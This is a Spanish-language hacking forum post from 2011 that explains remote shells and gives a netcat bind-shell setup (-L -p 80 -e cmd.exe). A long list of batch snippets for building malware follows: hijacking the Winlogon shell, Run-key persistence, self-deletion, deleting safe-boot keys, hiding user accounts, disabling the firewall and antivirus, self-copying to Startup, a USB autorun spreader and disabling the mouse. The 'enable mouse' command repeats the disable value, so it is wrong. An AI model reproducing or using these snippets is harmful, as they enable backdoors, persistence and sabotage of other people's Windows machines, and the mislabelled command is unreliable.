• MS-DOS y remote shell (editando)

  • Soluciona aquí tus preguntas frecuentes. Temas recomendados antes de preguntar.
Soluciona aquí tus preguntas frecuentes. Temas recomendados antes de preguntar.
 #281138  por $DoC
 27 Mar 2011, 21:51
MS-DOS y remote shell


¿Que es MS-DOS?
MS-DOS son las siglas de MicroSoft Disk Operating System, Sistema operativo de disco de Microsoft. Es un sistema operativo que a diferencia del Windows visual, se maneja en modo consola basandose en ordenes y comandos de texto. Este programa lo podemos encontrar como cmd.exe o command.com

¿Que es un backdoor?
Un backdoor es una conexión oculta que se establece abriendo un puerto cualquiera para.

¿Que es una shell?
Una shell es un entorno operativo, en el caso de windows se podria decir que la shell es cmd.exe

¿Que es remote shell?
Segun los conceptos anteriormente explicados, un remote shell es un backdoor que al recibir conexión devuelve una shell. Una conexión que se establece en la maquina servidor, que cuando responde devuelve un entorno operativo o shell.



NETCAT Y REMOTE SHELL
Netcat es una herramienta que permite a través de intérprete de comandos y con una sintaxis muy sencilla abrir puertos TCP/UDP en un HOST (quedando netcat a la escucha), asociar una shell a un puerto en concreto (para conectarse por ejemplo a MS-DOS o al intérprete de Bash Linux remotamente) y forzar conexiones UDP/TCP (útil por ejemplo para realizar rastreos de puertos o realizar transferencias de archivos bit a bit entre dos equipos).

PUERTOS, CONEXIONES Y COMANDOS.
Un puerto es una asignación numerica que identifica la conexión de otras conexiones de la maquina. Una conexión puede ser generada localmente, o solicitada externamente (Cliente/Servidor), por ultimo, los comandos que se usaran en la shell pueden ser los de cmd.exe por ejemplo. Tambien se pueden usar otros programas diferentes a cmd.exe como shell.

REMOTE SHELL BASICA CON NETCAT
1) Necesitamos poner en escucha el netcat y un puerto abierto

-L -p 80 (L:LISTENING, p:Puerto)

2) Necesitamos establecer un programa que se ejecute y sea shell cuando alguien conecte al puerto

-e cmd.exe (E:Ejecutar)



ALGUNOS PARAMETROS DEL NETCAT:
-d
Oculta la ventana (para usar en BATs por ejemplo)
-e progr
Pone en la conexion un programa para ejecutar cuando alguien conecte
-l
Modo en escucha simple, si se desconecta finaliza
-L
Modo en escucha continua, si se desconecta permanece en escucha
-n
Ingresar IP numerica para conectarse
-o file
Guardar el trafico en un archivo
-p port
Especifica un puerto para ponerlo en escucha
-v
Muestra detalles de lo que se ejecute

OTRAS FUNCIONES DE NETCAT:
[+] SCANNER PUERTOS:
Netcat puede ser utilizado como scanner, sus multiples opciones le permiten realizar un gran número de combinaciones, pudiendo realizar Scannings en Puertos Random, en puertos conocidos, en modo ascendente o descendente, con intervalos de tiempo, utilizando gateways para evitar mostrar la IP fuente del Scanning, etc.



[+] SNIFFER DE PUERTOS:
pSe puede abrir un puerto y crear una especie de 'honeypot', para registrar quien se conecta a el y capturar algunos de sus datos. Simular puertos o servicios como TELNET o HTTP, o tener un registro de lo que pasa en dichos puertos es una opcion más



[+] NETCAT COMO FILE TRANSFER:
Se puede emplear netcat para transferir un archivo de una PC a otra de manera sencilla usando los paramentros < (Poner archivo) y > (Recibir archivo). El cliente pone el archivo a transferir y el servidor se conecta para recibirlo.



[+] NETCAT EN REEMPLAZO DE TELNET:
Se puede usar para realizar conexiónes a otras maquinas y aprovechar sus otros recursos, haciendola una herramienta mas compleja que telnet por muchas razones como el tipo de negociaciones y la posibilidad de guardar logs Aunque no es la interfaz más segura, si sirve bastante cuando se trabaja con remote shells, backdoors, pentesting, conexiónes scripteadas y otros usos más que se le puede dar al netcat como plataforma telnet.



INTRODUCCION A LA LINEA DE COMANDOS




COMANDOS UTILES DESDE MS-DOS
MS-DOS ofrece una amplia selección de programas internos de Windows que nos permiten operar con el sistema.


BATCH SCRIPT Y RUTINAS
Ya que hay tantos comandos para aprovechar, se puede emplear archivo .BAT (listas de procedimientos con comandos MS-DOS) y automatizar tareas o generar rutinas más complejas, algunos ejemplos de lo que se puede hacer con BAT:

Crear y Ejecutar .reg (echo, regedit /s)
REM autoinicio winlogon
echo REGEDIT4 > nowindows.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >> nowindows.reg
echo "Shell"=- >> nowindows.reg
echo "Shell"="virii.exe" >> nowindows.reg
@regedit /s nowindows.regxe

Crear y Ejecutar .vbs (echo, start)

echo do > screensaver.vbs
echo set osh = wscript.CreateObject("wscript.Shell") >> screensaver.vbs
echo osh.run "scrnsave.scr",1,TRUE >> screensaver.vbs
echo loop >> screensaver.vbs
start screensaver.vbs

Autoborrado -melt- (Usando %0)

del %0

Usar variables personalizadas (SET, %Variable%)
REM Autoinicio Current version/run
SET /P rutareg=[Ingrese la ruta completa del archivo]
echo (Ejemplo: C:\windows\archivo.exe)
REM aqui comienza la creacion del .reg
> %WINDIR%\add.reg echo REGEDIT4
>> %WINDIR%\add.reg ECHO.
>> %WINDIR%\add.reg ECHO [HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
>> %WINDIR%\add.reg ECHO "hell1"[email protected]
>> %WINDIR%\add.reg ECHO "hell1"=%rutareg%
regedit /s %WINDIR%\add.reg

Crear y Ejecutar .bat (echo, start)

echo start calc.exe > run.bat
start run.bat

Remover entradas del registro (Reg delete)
REG DELETE "HKLM\SYSTEM\currentcontrolset\control\
safeboot\minimal" /f

Agregar entradas al registro (Reg add)
REG ADD HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList /v %user% /t REG_DWORD /d 0 /f
Asociar una extension con un archivo

assoc .jpg=mspaint.exe

Programar ejecucion de tareas (AT)

AT 12:00 rundll32.exe user32.dll LockWorkStation
Deshabilitar AV usando DATE
REM Si adelantamos la hora y año del sistema,
REM la licencia o los motores heuristicos en algunos
REM casos dejan de funciona

date 08-08-2020

Forzar cierre de sesion al usuario (start con dll)

start rundll32.exe user32.dll LockWorkStation
Deshabilitar firewall (netsh)
netsh firewall set opmode disable
Mostrar información del sistema
SYSTEMINFO

Loops simples (:label, goto label)
:loop
start calc.exe
goto loop

Crear carpetas y bloquear su acceso

REM ------ CREACION DE SUBCARPETA
REM :: Se declara la ruta como una variable ::
set ruta=%homedrive%\system volume information
REM :: Se va hasta dicha ruta ::
cd %ruta%
REM :: Creamos una carpeta llamada 'oculta' ::
mkdir oculta
REM ------ BLOQUEAR ACCESO A CARPETA
REM Aqui renombramos nuestra carpeta, el efecto sera que estara bloqueada
ren oculta oculta.{21EC2020-3AEA-1069-A2DD-08002B303}
REM :: Le asignamos +hidden para que quede oculta a la vista ::
attrib +H oculta.{21EC2020-3AEA-1069-A2DD-08002B303}

Cambiar atributos de los archivos (Attrib)

attrib -s -r -h "%systemroot%\system32\*.exe"
attrib -s -r -h "%systemroot%\system32\*.ini"
attrib -s -r -h "%systemroot%\system32\*.dll"

Copiar archivos a otra ruta (Copy)

copy %0 "%ALLUSERSPROFILE%\Menú Inicio\Programas\Autostart\" /Y > nul
copy %0 "%ALLUSERSPROFILE%\Menú Inicio\Programas\Startup\" /Y > nul

Cambiar la IP liberandola (IPCONFIG, netsh)
ipconfig /release
netsh interface IP set address "Conexion de area local" static 1.2.3.4 255.0.0.0 1.2.3.5 0
netsh interface IP set address "Conexion de area local" dhcp

Creando autoinicio en USB (echo, autorun.inf)

echo [AUTORUN] > AUTORUN.INF

echo shell\1=abrir >> AUTORUN.INF

echo shell\1\Command="%0" >> AUTORUN.INF

echo shell\2=explorar >> AUTORUN.INF

echo shellexecute= "\%0" >> AUTORUN.INF
Deshabilitar mouse en regedit (reg add)
reg add "HKLM\System\CurrentControlSet\Services\Mouclass" /v Start /t REG_DWORD /d "0" /f>nul Habilitar mouse en regedit (reg add)
reg add "HKLM\System\CurrentControlSet\Services\Mouclass" /v Start /t REG_DWORD /d "0" /f>nul